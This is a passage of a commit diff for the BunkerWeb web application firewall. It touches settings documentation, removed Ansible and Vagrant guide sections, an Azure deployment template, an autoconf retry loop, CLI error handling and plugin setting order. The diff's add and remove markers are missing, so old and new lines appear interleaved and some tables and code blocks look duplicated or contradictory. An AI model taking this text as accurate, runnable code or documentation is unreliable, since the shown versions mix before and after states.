## Reporting <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style='transform : translateY(3px);'> (PRO)
@ -563,19 +565,20 @@ STREAM support :x:
Regular reporting of important data from BunkerWeb (global, attacks, bans, requests, reasons, AS...). Monitoring pro plugin needed to work.
| Setting |Default |Context|Multiple| Description |
|------------------------------|--------|-------|--------|----------------------------------------------------------------------------------------------------------------------------------|
|`USE_REPORTING_SMTP` |`no` |global |no |Enable sending the report via email. |
|`USE_REPORTING_WEBHOOK` |`no` |global |no |Enable sending the report via webhook. |
|`REPORTING_SCHEDULE` |`weekly`|global |no |The frequency at which reports are sent. |
|`REPORTING_WEBHOOK_URLS` | |global |no |List of webhook URLs to receive the report in Markdown (separated by spaces). |
|`REPORTING_SMTP_EMAILS` | |global |no |List of email addresses to receive the report in HTML format (separated by spaces). |
|`REPORTING_SMTP_HOST` | |global |no |The host server used for SMTP sending. |
|`REPORTING_SMTP_PORT` |`465` |global |no |The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587).|
|`REPORTING_SMTP_FROM_EMAIL` | |global |no |The email address used as the sender. Note that 2FA must be disabled for this email address. |
|`REPORTING_SMTP_FROM_USER` | |global |no |The user authentication value for sending via the from email address. |
|`REPORTING_SMTP_FROM_PASSWORD`| |global |no |The password authentication value for sending via the from email address. |
|`REPORTING_SMTP_SSL` |`SSL` |global |no |Determine whether or not to use a secure connection for SMTP. |
| Setting | Default |Context|Multiple| Description |
|------------------------------|------------------|-------|--------|----------------------------------------------------------------------------------------------------------------------------------|
|`USE_REPORTING_SMTP` |`no` |global |no |Enable sending the report via email. |
|`USE_REPORTING_WEBHOOK` |`no` |global |no |Enable sending the report via webhook. |
|`REPORTING_SCHEDULE` |`weekly` |global |no |The frequency at which reports are sent. |
|`REPORTING_WEBHOOK_URLS` | |global |no |List of webhook URLs to receive the report in Markdown (separated by spaces). |
|`REPORTING_SMTP_EMAILS` | |global |no |List of email addresses to receive the report in HTML format (separated by spaces). |
|`REPORTING_SMTP_HOST` | |global |no |The host server used for SMTP sending. |
|`REPORTING_SMTP_PORT` |`465` |global |no |The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587).|
|`REPORTING_SMTP_FROM_EMAIL` | |global |no |The email address used as the sender. Note that 2FA must be disabled for this email address. |
|`REPORTING_SMTP_FROM_USER` | |global |no |The user authentication value for sending via the from email address. |
|`REPORTING_SMTP_FROM_PASSWORD`| |global |no |The password authentication value for sending via the from email address. |
|`REPORTING_SMTP_SSL` |`SSL` |global |no |Determine whether or not to use a secure connection for SMTP. |
|`REPORTING_SMTP_SUBJECT` |`BunkerWeb Report`|global |no |The subject line of the email. |
## Reverse proxy
@ -587,8 +590,9 @@ Manage reverse proxy configurations.
|---------------------------------------|----------------------------------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------|
|`USE_REVERSE_PROXY` |`no` |multisite|no |Activate reverse proxy mode. |
|`REVERSE_PROXY_INTERCEPT_ERRORS` |`yes` |multisite|no |Intercept and rewrite errors. |
|`REVERSE_PROXY_CUSTOM_HOST` | |multisite|no |Override Host header sent to upstream server. |
|`REVERSE_PROXY_HOST` | |multisite|yes |Full URL of the proxied resource (proxy_pass). |
|`REVERSE_PROXY_URL` | |multisite|yes |Location URL that will be proxied. |
|`REVERSE_PROXY_URL` |`/` |multisite|yes |Location URL that will be proxied. |
|`REVERSE_PROXY_WS` |`no` |multisite|yes |Enable websocket on the proxied resource. |
|`REVERSE_PROXY_HEADERS` | |multisite|yes |List of HTTP headers to send to proxied resource separated with semicolons (values for proxy_set_header directive). |
|`REVERSE_PROXY_HEADERS_CLIENT` | |multisite|yes |List of HTTP headers to send to client separated with semicolons (values for add_header directive). |
@ -597,6 +601,10 @@ Manage reverse proxy configurations.
|`REVERSE_PROXY_AUTH_REQUEST` | |multisite|yes |Enable authentication using an external provider (value of auth_request directive). |
|`REVERSE_PROXY_AUTH_REQUEST_SIGNIN_URL`| |multisite|yes |Redirect clients to sign-in URL when using REVERSE_PROXY_AUTH_REQUEST (used when auth_request call returned 401). |
|`REVERSE_PROXY_AUTH_REQUEST_SET` | |multisite|yes |List of variables to set from the authentication provider, separated with semicolons (values of auth_request_set directives).|
|`REVERSE_PROXY_CONNECT_TIMEOUT` |`60s` |multisite|yes |Timeout when connecting to the proxied resource. |
|`REVERSE_PROXY_READ_TIMEOUT` |`60s` |multisite|yes |Timeout when reading from the proxied resource. |
|`REVERSE_PROXY_SEND_TIMEOUT` |`60s` |multisite|yes |Timeout when sending to the proxied resource. |
|`REVERSE_PROXY_INCLUDES` | |multisite|yes |Additional configuration to include in the location block, separated with spaces. |
|`USE_PROXY_CACHE` |`no` |multisite|no |Enable or disable caching of the proxied resources. |
|`PROXY_CACHE_PATH_LEVELS` |`1:2` |global |no |Hierarchy levels of the cache. |
|`PROXY_CACHE_PATH_ZONE_SIZE` |`10m` |global |no |Maximum size of cached metadata when caching proxied resources. |
@ -607,11 +615,6 @@ Manage reverse proxy configurations.
|`PROXY_CACHE_VALID` |`200=24h 301=1h 302=24h` |multisite|no |Define the caching time depending on the HTTP status code (list of status=time), separated with spaces. |
|`PROXY_NO_CACHE` |`$http_pragma $http_authorization`|multisite|no |Conditions to disable caching of responses. |
|`PROXY_CACHE_BYPASS` |`0` |multisite|no |Conditions to bypass caching of responses. |
|`REVERSE_PROXY_CONNECT_TIMEOUT` |`60s` |multisite|yes |Timeout when connecting to the proxied resource. |
|`REVERSE_PROXY_READ_TIMEOUT` |`60s` |multisite|yes |Timeout when reading from the proxied resource. |
|`REVERSE_PROXY_SEND_TIMEOUT` |`60s` |multisite|yes |Timeout when sending to the proxied resource. |
|`REVERSE_PROXY_INCLUDES` | |multisite|yes |Additional configuration to include in the location block, separated with spaces. |
|`REVERSE_PROXY_CUSTOM_HOST` | |multisite|no |Override Host header sent to upstream server. |
## Reverse scan
@ -674,13 +677,13 @@ Allow access based on internal and external IP/network/rDNS/ASN whitelists.
|---------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|----------------------------------------------------------------------------------|
|`USE_WHITELIST` |`yes` |multisite|no |Activate whitelist feature. |
|`WHITELIST_IP` |`20.191.45.212 40.88.21.235 40.76.173.151 40.76.163.7 20.185.79.47 52.142.26.175 20.185.79.15 52.142.24.149 40.76.162.208 40.76.163.23 40.76.162.191 40.76.162.247` |multisite|no |List of IP/network, separated with spaces, to put into the whitelist. |
|`WHITELIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to whitelist. |
|`WHITELIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS whitelist checks on global IP addresses. |
|`WHITELIST_RDNS` |`.google.com .googlebot.com .yandex.ru .yandex.net .yandex.com .search.msn.com .baidu.com .baidu.jp .crawl.yahoo.net .fwd.linkedin.com .twitter.com .twttr.com .discord.com`|multisite|no |List of reverse DNS suffixes, separated with spaces, to whitelist. |
|`WHITELIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist.|
|`WHITELIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS whitelist checks on global IP addresses. |
|`WHITELIST_ASN` |`32934` |multisite|no |List of ASN numbers, separated with spaces, to whitelist. |
|`WHITELIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to whitelist. |
|`WHITELIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to whitelist. |
|`WHITELIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to whitelist. |
|`WHITELIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to whitelist. |
|`WHITELIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to whitelist. |
|`WHITELIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist.|
|`WHITELIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to whitelist. |
|`WHITELIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to whitelist. |
|`WHITELIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to whitelist. |

40
docs/troubleshooting.md
View file

@ -89,32 +89,6 @@ Here is how you can access the logs, depending on your integration :
cat /var/log/bunkerweb/access.log
```
=== "Ansible"
For errors related to BunkerWeb services (e.g. not starting), you can use `journalctl` :
```shell
ansible -i inventory.yml all -a "journalctl -u bunkerweb --no-pager" --become
```
Common logs are located inside the `/var/log/bunkerweb` directory :
```shell
ansible -i inventory.yml all -a "cat /var/log/bunkerweb/error.log" --become
ansible -i inventory.yml all -a "cat /var/log/bunkerweb/access.log" --become
```
=== "Vagrant"
For errors related to BunkerWeb services (e.g. not starting), you can use `journalctl` :
```shell
journalctl -u bunkerweb --no-pager
```
Common logs are located inside the `/var/log/bunkerweb` directory :
```shell
cat /var/log/bunkerweb/error.log
cat /var/log/bunkerweb/access.log
```
## Permissions
Don't forget that BunkerWeb runs as an unprivileged user for obvious security reasons. Double-check the permissions of files and folders used by BunkerWeb, especially if you use custom configurations (more info [here](quickstart-guide.md#custom-configurations)). You will need to set at least **RW** rights on files and **_RWX_** on folders.
@ -267,20 +241,6 @@ You can manually unban an IP which can be useful when doing some tests but it ne
sudo bwcli unban 1.2.3.4
```
=== "Ansible"
You can use the `bwcli` command :
```shell
ansible -i inventory.yml all -a "bwcli unban 1.2.3.4" --become
```
=== "Vagrant"
You can use the `bwcli` command (as root) :
```shell
sudo bwcli unban 1.2.3.4
```
## Whitelisting
If you have bots that need to access your website, the recommended way to avoid any false positive is to whitelist them using the [whitelisting feature](security-tuning.md#blacklisting-and-whitelisting). We don't recommend using the `WHITELIST_URI*` or `WHITELIST_USER_AGENT*` settings unless they are set to secret and unpredictable values. Common use cases are :

4
docs/upgrading.md
View file

@ -151,7 +151,7 @@
3. **Stop the services**:
```bash
systemctl stop bunkerweb-scheduler
systemctl stop bunkerweb
systemctl stop bunkerweb-ui
```
@ -275,7 +275,7 @@
4. **Stop the services**.
```bash
systemctl stop bunkerweb-scheduler
systemctl stop bunkerweb
systemctl stop bunkerweb-ui
```

113
docs/web-ui.md
View file

@ -1607,117 +1607,8 @@ After a successful login/password combination, you will be prompted to enter you
www.example.com_MAX_CLIENT_SIZE=50m
```
Don't forget to restart the `bunkerweb` service :
Don't forget to reload the `bunkerweb` service :
```shell
systemctl restart bunkerweb
```
=== "Ansible"
The installation of the web UI using the [Vagrant integration](integrations.md#linux) is pretty straightforward because it is installed with BunkerWeb.
Create a `my_ui.env` filed used to configure the web UI :
```conf
ADMIN_USERNAME=changeme
ADMIN_PASSWORD=changeme
```
Here is the `my_variables.env` boilerplate you can use :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
SERVER_NAME=www.example.com
MULTISITE=yes
www.example.com_USE_UI=yes
www.example.com_USE_REVERSE_PROXY=yes
www.example.com_REVERSE_PROXY_URL=/changeme
www.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:7000
www.example.com_INTERCEPTED_ERROR_CODES=400 404 405 413 429 500 501 502 503 504
www.example.com_MAX_CLIENT_SIZE=50m
```
The variable `enable_ui` can be set to `true` in order to activate the web UI service and the variable `custom_ui` can be used to specify the configuration file for the web UI :
```ini
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env" enable_ui=true custom_ui="{{ playbook_dir }}/my_ui.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
- enable_ui: true
- custom_ui: "{{ playbook_dir }}/my_ui.env"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook and be able to access the web UI :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
The installation of the web UI using the [Vagrant integration](integrations.md#vagrant) is pretty straightforward because it is installed with BunkerWeb.
First of all, you will need to get a shell on your Vagrant box :
```shell
vagrant ssh
```
The web UI comes as systemd service named `bunkerweb-ui` which is not enabled by default. If you want to start the web UI when on startup you can run the following command :
```shell
systemctl enable bunkerweb-ui
```
A dedicated environment file located at `/etc/bunkerweb/ui.env` is used to configure the web UI :
```conf
ADMIN_USERNAME=changeme
ADMIN_PASSWORD=changeme
```
Each time you edit the `/etc/bunkerweb/ui.env` file, you will need to restart the service :
```shell
systemctl restart bunkerweb-ui
```
Accessing the web UI through BunkerWeb is a classical [reverse proxy setup](quickstart-guide.md#protect-http-applications). Please note that the web UI is listening on the `7000` port and only on the loopback interface.
Here is the `/etc/bunkerweb/variables.env` boilerplate you can use :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
SERVER_NAME=www.example.com
MULTISITE=yes
www.example.com_USE_UI=yes
www.example.com_USE_REVERSE_PROXY=yes
www.example.com_REVERSE_PROXY_URL=/changeme
www.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:7000
www.example.com_INTERCEPTED_ERROR_CODES=400 404 405 413 429 500 501 502 503 504
www.example.com_MAX_CLIENT_SIZE=50m
```
Don't forget to restart the `bunkerweb` service :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```

1
examples/cors/tests.json
View file

@ -2,6 +2,7 @@
"name": "cors",
"kinds": ["docker", "autoconf", "linux"],
"timeout": 120,
"delay": 120,
"tests": [
{
"type": "string",

2
examples/ghost/tests.json
View file

@ -2,7 +2,7 @@
"name": "ghost",
"kinds": ["docker", "autoconf", "swarm", "kubernetes"],
"timeout": 60,
"delay": 240,
"delay": 300,
"tests": [
{
"type": "string",

1
examples/proxy-protocol/tests.json
View file

@ -1,6 +1,7 @@
{
"name": "proxy-protocol",
"kinds": ["docker"],
"delay": 30,
"timeout": 60,
"tests": [
{

236
misc/integrations/azure-arm-template.json Normal file
View file

@ -0,0 +1,236 @@
{
"$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"location": {
"type": "string"
},
"networkInterfaceName1": {
"type": "string"
},
"networkSecurityGroupName": {
"type": "string"
},
"networkSecurityGroupRules": {
"type": "array"
},
"subnetName": {
"type": "string"
},
"virtualNetworkName": {
"type": "string"
},
"addressPrefixes": {
"type": "array"
},
"subnets": {
"type": "array"
},
"publicIpAddressName1": {
"type": "string"
},
"publicIpAddressType": {
"type": "string"
},
"publicIpAddressSku": {
"type": "string"
},
"pipDeleteOption": {
"type": "string"
},
"virtualMachineName": {
"type": "string"
},
"virtualMachineName1": {
"type": "string"
},
"virtualMachineComputerName1": {
"type": "string"
},
"virtualMachineRG": {
"type": "string"
},
"osDiskType": {
"type": "string"
},
"osDiskDeleteOption": {
"type": "string"
},
"virtualMachineSize": {
"type": "string"
},
"nicDeleteOption": {
"type": "string"
},
"hibernationEnabled": {
"type": "bool"
},
"adminUsername": {
"type": "string"
},
"securityType": {
"type": "string"
},
"secureBoot": {
"type": "bool"
},
"vTPM": {
"type": "bool"
},
"virtualMachine1Zone": {
"type": "string"
}
},
"variables": {
"nsgId": "[resourceId(resourceGroup().name, 'Microsoft.Network/networkSecurityGroups', parameters('networkSecurityGroupName'))]",
"vnetName": "[parameters('virtualNetworkName')]",
"vnetId": "[resourceId(resourceGroup().name,'Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]",
"subnetRef": "[concat(variables('vnetId'), '/subnets/', parameters('subnetName'))]"
},
"resources": [
{
"name": "[parameters('networkInterfaceName1')]",
"type": "Microsoft.Network/networkInterfaces",
"apiVersion": "2022-11-01",
"location": "[parameters('location')]",
"dependsOn": [
"[concat('Microsoft.Network/networkSecurityGroups/', parameters('networkSecurityGroupName'))]",
"[concat('Microsoft.Network/virtualNetworks/', parameters('virtualNetworkName'))]",
"[concat('Microsoft.Network/publicIpAddresses/', parameters('publicIpAddressName1'))]"
],
"properties": {
"ipConfigurations": [
{
"name": "ipconfig1",
"properties": {
"subnet": {
"id": "[variables('subnetRef')]"
},
"privateIPAllocationMethod": "Dynamic",
"publicIpAddress": {
"id": "[resourceId(resourceGroup().name, 'Microsoft.Network/publicIpAddresses', parameters('publicIpAddressName1'))]",
"properties": {
"deleteOption": "[parameters('pipDeleteOption')]"
}
}
}
}
],
"networkSecurityGroup": {
"id": "[variables('nsgId')]"
}
}
},
{
"name": "[parameters('networkSecurityGroupName')]",
"type": "Microsoft.Network/networkSecurityGroups",
"apiVersion": "2020-05-01",
"location": "[parameters('location')]",
"properties": {
"securityRules": "[parameters('networkSecurityGroupRules')]"
}
},
{
"name": "[parameters('virtualNetworkName')]",
"type": "Microsoft.Network/virtualNetworks",
"apiVersion": "2023-02-01",
"location": "[parameters('location')]",
"properties": {
"addressSpace": {
"addressPrefixes": "[parameters('addressPrefixes')]"
},
"subnets": "[parameters('subnets')]"
}
},
{
"name": "[parameters('publicIpAddressName1')]",
"type": "Microsoft.Network/publicIpAddresses",
"apiVersion": "2020-08-01",
"location": "[parameters('location')]",
"properties": {
"publicIpAllocationMethod": "[parameters('publicIpAddressType')]"
},
"sku": {
"name": "[parameters('publicIpAddressSku')]"
},
"zones": [
"[parameters('virtualMachine1Zone')]"
]
},
{
"name": "[parameters('virtualMachineName1')]",
"type": "Microsoft.Compute/virtualMachines",
"apiVersion": "2024-03-01",
"location": "[parameters('location')]",
"dependsOn": [
"[concat('Microsoft.Network/networkInterfaces/', parameters('networkInterfaceName1'))]"
],
"properties": {
"hardwareProfile": {
"vmSize": "[parameters('virtualMachineSize')]"
},
"storageProfile": {
"osDisk": {
"createOption": "fromImage",
"managedDisk": {
"storageAccountType": "[parameters('osDiskType')]"
},
"deleteOption": "[parameters('osDiskDeleteOption')]"
},
"imageReference": {
"publisher": "bunkerity",
"offer": "bunkerweb",
"sku": "bunkerweb",
"version": "latest"
}
},
"networkProfile": {
"networkInterfaces": [
{
"id": "[resourceId('Microsoft.Network/networkInterfaces', parameters('networkInterfaceName1'))]",
"properties": {
"deleteOption": "[parameters('nicDeleteOption')]"
}
}
]
},
"additionalCapabilities": {
"hibernationEnabled": false
},
"osProfile": {
"computerName": "[parameters('virtualMachineComputerName1')]",
"adminUsername": "[parameters('adminUsername')]",
"linuxConfiguration": {
"disablePasswordAuthentication": true
}
},
"securityProfile": {
"securityType": "[parameters('securityType')]",
"uefiSettings": {
"secureBootEnabled": "[parameters('secureBoot')]",
"vTpmEnabled": "[parameters('vTPM')]"
}
},
"diagnosticsProfile": {
"bootDiagnostics": {
"enabled": true
}
}
},
"plan": {
"name": "bunkerweb",
"publisher": "bunkerity",
"product": "bunkerweb"
},
"zones": [
"[parameters('virtualMachine1Zone')]"
]
}
],
"outputs": {
"adminUsername": {
"type": "string",
"value": "[parameters('adminUsername')]"
}
}
}

17
src/autoconf/Config.py
View file

@ -61,6 +61,23 @@ class Config(ConfigCaller):
return True
return False
def wait_applying(self):
i = 0
while i < 10:
curr_changes = self._db.check_changes()
if isinstance(curr_changes, str):
self.__logger.error(f"An error occurred when checking for changes in the database : {curr_changes}")
elif not any(curr_changes.values()):
break
else:
self.__logger.warning(
"Scheduler is already applying a configuration, retrying in 5 seconds ...",
)
i += 1
sleep(5)
if i >= 10:
raise Exception("Too many retries while waiting for scheduler to apply configuration...")
def apply(self, instances, services, configs={}, first=False) -> bool:
success = True

1
src/autoconf/DockerController.py
View file

@ -120,6 +120,7 @@ class DockerController(Controller):
try:
if not self.__process_event(event):
continue
self.wait_applying()
self._update_settings()
self._instances = self.get_instances()
self._services = self.get_services()

1
src/autoconf/IngressController.py
View file

@ -278,6 +278,7 @@ class IngressController(Controller):
self.__internal_lock.release()
locked = False
continue
self.wait_applying()
self._update_settings()
self._instances = self.get_instances()
self._services = self.get_services()

1
src/autoconf/SwarmController.py
View file

@ -157,6 +157,7 @@ class SwarmController(Controller):
locked = False
continue
try:
self.wait_applying()
self._update_settings()
self._instances = self.get_instances()
self._services = self.get_services()

1
src/bw/lua/bunkerweb/utils.lua
View file

@ -606,6 +606,7 @@ utils.get_session = function(ctx)
logger:log(ERR, "error while getting variable SESSIONS_CHECK_" .. check .. " : " .. err)
elseif check_value == "yes" and value ~= metadata[check] then
logger:log(WARN, "session check failed : " .. check .. "!=" .. metadata[check])
session:clear_request_cookie()
local ok
ok, err = session:destroy()
if not ok then

19
src/common/cli/CLI.py
View file

@ -223,8 +223,11 @@ class CLI(ApiCaller):
except Exception as e:
self.__logger.error(f"Failed to delete ban for {ip} from redis: {e}")
if self.send_to_apis("POST", "/unban", data={"ip": ip}):
return True, f"IP {ip} has been unbanned"
try:
if self.send_to_apis("POST", "/unban", data={"ip": ip}):
return True, f"IP {ip} has been unbanned"
except BaseException as e:
return False, f"Failed to unban {ip}: {e}"
return False, f"Failed to unban {ip}"
def ban(self, ip: str, exp: float, reason: str) -> Tuple[bool, str]:
@ -237,14 +240,20 @@ class CLI(ApiCaller):
except Exception as e:
self.__logger.error(f"Failed to ban {ip} in redis: {e}")
if self.send_to_apis("POST", "/ban", data={"ip": ip, "exp": exp, "reason": reason}):
return (True, f"IP {ip} has been banned for {format_remaining_time(exp)} with reason {reason}")
try:
if self.send_to_apis("POST", "/ban", data={"ip": ip, "exp": exp, "reason": reason}):
return True, f"IP {ip} has been banned for {format_remaining_time(exp)} with reason {reason}"
except BaseException as e:
return False, f"Failed to ban {ip}: {e}"
return False, f"Failed to ban {ip}"
def bans(self) -> Tuple[bool, str]:
servers = {}
ret, resp = self.send_to_apis("GET", "/bans", response=True)
try:
ret, resp = self.send_to_apis("GET", "/bans", response=True)
except BaseException as e:
return False, f"Failed to get bans: {e}"
if not ret:
return False, "error"

36
src/common/core/antibot/plugin.json
View file

@ -32,6 +32,24 @@
"regex": "^\\/[\\w\\].~:\\/?#\\[@!$\\&'\\(\\)*+,;=\\-]*$",
"type": "text"
},
"ANTIBOT_TIME_RESOLVE": {
"context": "multisite",
"default": "60",
"help": "Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.",
"id": "antibot-time-resolve",
"label": "Time to resolve",
"regex": "^[0-9]+$",
"type": "text"
},
"ANTIBOT_TIME_VALID": {
"context": "multisite",
"default": "86400",
"help": "Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one.",
"id": "antibot-time-valid",
"label": "Time valid",
"regex": "^[0-9]+$",
"type": "text"
},
"ANTIBOT_RECAPTCHA_SCORE": {
"context": "multisite",
"default": "0.7",
@ -94,24 +112,6 @@
"label": "Turnstile secret",
"regex": "^(0x[\\w\\-]+)?$",
"type": "password"
},
"ANTIBOT_TIME_RESOLVE": {
"context": "multisite",
"default": "60",
"help": "Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.",
"id": "antibot-time-resolve",
"label": "Time to resolve",
"regex": "^[0-9]+$",
"type": "text"
},
"ANTIBOT_TIME_VALID": {
"context": "multisite",
"default": "86400",
"help": "Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one.",
"id": "antibot-time-valid",
"label": "Time valid",
"regex": "^[0-9]+$",
"type": "text"
}
}
}

6
src/common/core/antibot/ui/actions.py
View file

@ -9,14 +9,14 @@ def pre_render(**kwargs):
"value": data.get("counter_failed_challenges", 0),
"title": "Challenge",
"subtitle": "Failed",
"subtitle_color": "info",
"svg_color": "blue",
"subtitle_color": "error",
"svg_color": "red",
}
}
except BaseException:
print(format_exc(), flush=True)
return {
"counter_failed_challenges": {"value": "unknown", "title": "Challenge", "subtitle": "Failed", "subtitle_color": "info", "svg_color": "blue"},
"counter_failed_challenges": {"value": "unknown", "title": "Challenge", "subtitle": "Failed", "subtitle_color": "error", "svg_color": "red"},
"error": format_exc(),
}

20
src/common/core/backup/plugin.json
View file

@ -14,19 +14,10 @@
"regex": "^(yes|no)$",
"type": "check"
},
"BACKUP_DIRECTORY": {
"context": "global",
"default": "/var/lib/bunkerweb/backups",
"help": "The directory where the backup will be stored",
"id": "backup-directory",
"label": "Backup directory",
"regex": "^.*$",
"type": "text"
},
"BACKUP_SCHEDULE": {
"context": "global",
"default": "daily",
"help": "The frequency of the backup",
"help": "The frequency of the backup (daily, weekly or monthly)",
"id": "backup-schedule",
"label": "Backup schedule",
"regex": "^(daily|weekly|monthly)$",
@ -41,6 +32,15 @@
"label": "Backup rotation",
"regex": "^[1-9][0-9]*$",
"type": "text"
},
"BACKUP_DIRECTORY": {
"context": "global",
"default": "/var/lib/bunkerweb/backups",
"help": "The directory where the backup will be stored",
"id": "backup-directory",
"label": "Backup directory",
"regex": "^.*$",
"type": "text"
}
},
"jobs": [

18
src/common/core/badbehavior/plugin.json
View file

@ -23,15 +23,6 @@
"regex": "^( *([1-5]\\d{2})(?!.*\\2) *)+$",
"type": "text"
},
"BAD_BEHAVIOR_BAN_TIME": {
"context": "multisite",
"default": "86400",
"help": "The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.",
"id": "bad-behavior-ban-time",
"label": "Ban duration (in seconds)",
"regex": "^\\d+",
"type": "text"
},
"BAD_BEHAVIOR_THRESHOLD": {
"context": "multisite",
"default": "10",
@ -49,6 +40,15 @@
"label": "Period (in seconds)",
"regex": "^\\d+",
"type": "text"
},
"BAD_BEHAVIOR_BAN_TIME": {
"context": "multisite",
"default": "86400",
"help": "The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.",
"id": "bad-behavior-ban-time",
"label": "Ban duration (in seconds)",
"regex": "^\\d+",
"type": "text"
}
}
}

176
src/common/core/blacklist/plugin.json
View file

@ -23,13 +23,13 @@
"regex": "^(?! )( *(((\\b25[0-5]|\\b2[0-4]\\d|\\b[01]?\\d\\d?)(\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)){3})(\\/([1-2][0-9]?|3[0-2]?|[04-9]))?|(([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]Z{0,4}){0,4}%[0-9a-zA-Z]+|::(ffff(:0{1,4})?:)?((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d)|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d))(\\/(12[0-8]|1[01][0-9]|[0-9][0-9]?))?)(?!.*\\D\\2([^\\d\\/]|$)) *)*$",
"type": "text"
},
"BLACKLIST_IP_URLS": {
"context": "global",
"default": "https://www.dan.me.uk/torlist/?exit",
"help": "List of URLs, separated with spaces, containing bad IP/network to block.",
"id": "blacklist-ip-urls",
"label": "Blacklist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"BLACKLIST_RDNS": {
"context": "multisite",
"default": ".shodan.io .censys.io",
"help": "List of reverse DNS suffixes, separated with spaces, to block.",
"id": "blacklist-rdns",
"label": "Blacklist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"BLACKLIST_RDNS_GLOBAL": {
@ -41,24 +41,6 @@
"regex": "^(yes|no)$",
"type": "check"
},
"BLACKLIST_RDNS": {
"context": "multisite",
"default": ".shodan.io .censys.io",
"help": "List of reverse DNS suffixes, separated with spaces, to block.",
"id": "blacklist-rdns",
"label": "Blacklist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"BLACKLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to block.",
"id": "blacklist-rdns-urls",
"label": "Blacklist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_ASN": {
"context": "multisite",
"default": "",
@ -68,15 +50,6 @@
"regex": "^^( *((ASN?)?(\\d+)\\b(?!.*[SN ]\\4\\b)) *)*$",
"type": "text"
},
"BLACKLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to block.",
"id": "blacklist-asn-urls",
"label": "Blacklist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_USER_AGENT": {
"context": "multisite",
"default": "",
@ -86,15 +59,6 @@
"regex": "^.*$",
"type": "text"
},
"BLACKLIST_USER_AGENT_URLS": {
"context": "global",
"default": "https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list",
"help": "List of URLs, separated with spaces, containing bad User-Agent to block.",
"id": "blacklist-user-agent-urls",
"label": "Blacklist User-Agent URLs",
